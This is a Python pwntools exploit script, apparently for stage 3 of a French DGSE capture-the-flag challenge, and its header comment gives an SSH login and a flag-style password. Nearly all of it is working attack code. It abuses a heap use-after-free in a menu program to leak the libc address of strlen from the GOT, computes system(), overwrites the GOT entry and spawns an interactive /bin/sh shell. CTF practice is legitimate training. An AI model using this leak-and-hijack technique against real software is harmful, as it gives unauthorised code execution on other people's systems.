Rich 3

stage3.py

# coding: utf8

'''
ssh defi3.challengecybersec.fr -l defi3 -p 2222

mot de passe : DGSE{?uo20tPO4(o=A=dX3njr2y{emZQodR}

'''
from pwn import *
import struct

def rq(v):
    return struct.unpack("<Q", v[:8])[0]

def start():
    global p, libc
    try:
        p.close()
    except:
        pass   
    p = process(['./prog.bin','16'])
    pause()
    print p.recvuntil("sortie\n")

def create(nom, id):
    p.sendline("1")
    p.sendline(nom)
    p.sendline(id)
    dumb= p.recvuntil("sortie\n")

def show():
    p.sendline("2")
    a=p.recvuntil("sortie\n")
    return a

def delete(ele,idornom):
    p.sendline("3")
    p.sendline(str(ele))
    p.sendline(str(idornom))
    dumb = p.recvuntil("sortie\n")


def changenom(ele,nom):
    p.sendline("4")
    p.sendline(str(ele))
    p.send(nom)
    dumb = p.recvuntil("sortie\n")

def changeid(ele,id):
    p.sendline("5")
    p.sendline(str(ele))
    p.sendline(id)
    dumb = p.recvuntil("sortie\n")

def close():
    p.sendline("6")
    p.recv(500)
    p.close()


start()
create("a", "b")
delete(0, 2)
create("c", "d")
changenom(0, "\x30\x20\x60\n") #0x602030 GOT strlen

tmp = show()

'''
defi3@AttrapeLeDrapeau:~$ readelf -s /lib/x86_64-linux-gnu/libc-2.24.so | grep system@
  1353: 000000000003f480    45 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.2.5
defi3@AttrapeLeDrapeau:~$ readelf -s /lib/x86_64-linux-gnu/libc-2.24.so | grep strlen@
   777: 0000000000080650   412 FUNC    GLOBAL DEFAULT   13 strlen@@GLIBC_2.2.5
'''

LIBC_system_offset = 0x3f480
LIBC_strlen_offset = 0x80650

LIBC_strlen = rq(tmp.split("élément[1]\t-> nom : ")[1].split('\n')[0]+"\x00"*2)
LIBC_base = LIBC_strlen - LIBC_strlen_offset
LIBC_system = LIBC_base + LIBC_system_offset

print "LIBC_strlen\t-> ", hex(LIBC_strlen)
print "LIBC_base\t-> ", hex(LIBC_base)
print "LIBC_system\t-> ", hex(LIBC_system)

changenom(1, p64(LIBC_system)[:-2]+"\n")

p.sendline("/bin/sh")
p.interactive()